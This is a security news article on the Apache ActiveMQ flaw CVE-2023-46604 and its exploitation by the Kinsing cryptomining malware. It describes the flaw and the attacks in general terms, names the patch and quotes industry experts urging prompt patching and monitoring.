A critical vulnerability in Apache ActiveMQ, known as CVE-2023-46604, has been exposed, revealing an active exploitation scenario by the notorious Kinsing malware. This vulnerability, as reported by Trend Micro, allows for remote code execution on Linux systems due to inadequate validation of throwable class types in OpenWire commands.
Apache ActiveMQ, a widely used Java-based open source protocol for message-oriented middleware, serves as a communication bridge between different applications. However, Kinsing malware, specifically targeting Linux-based systems, takes advantage of web application vulnerabilities and misconfigured container environments to infiltrate servers and spread rapidly across networks.
The exploitation of CVE-2023-46604 has been reported since November, with threat actors using exploits like Metasploit and Nuclei. Despite its severity with a CVSS score of 9.8, detection rates remain relatively low.
John Gallagher, vice president of Viakoo Labs at Viakoo, highlighted the widespread usage of Apache ActiveMQ and its communication capabilities across various protocols, including MQTT. This makes it a prime target for threat actors looking to interface with IoT/OT/ICS devices, especially those lacking patching policies.
The Kinsing exploit leverages the ProcessBuilder method to download and execute cryptocurrency miners and malware on compromised systems. It actively seeks out and eliminates competing cryptocurrency miners to maximize its impact. In addition to CVE-2023-46604, the threat actors behind Kinsing also target other high-profile vulnerabilities like CVE-2023-4911 (Looney Tunables).
Trend Micro advises users to promptly update and patch their systems to mitigate the risks associated with CVE-2023-46604. The patch introduces the “validateIsThrowable” method in the “BaseDataStreamMarshall” class to address the root cause of the vulnerability.
Ken Dunham, director of cyber threat at Qualys, emphasizes the importance of prioritizing patching and remediation efforts, especially for external-facing assets and high-value systems. Extensive monitoring, logging reviews, and the implementation of workarounds can help mitigate known tactics, techniques, and procedures (TTPs) used in attacks until the risk of exploitation is fully remediated.
In conclusion, organizations must remain vigilant and proactive in securing their systems against evolving threats like Kinsing malware by staying informed, applying patches promptly, and implementing robust security measures to safeguard their assets and data.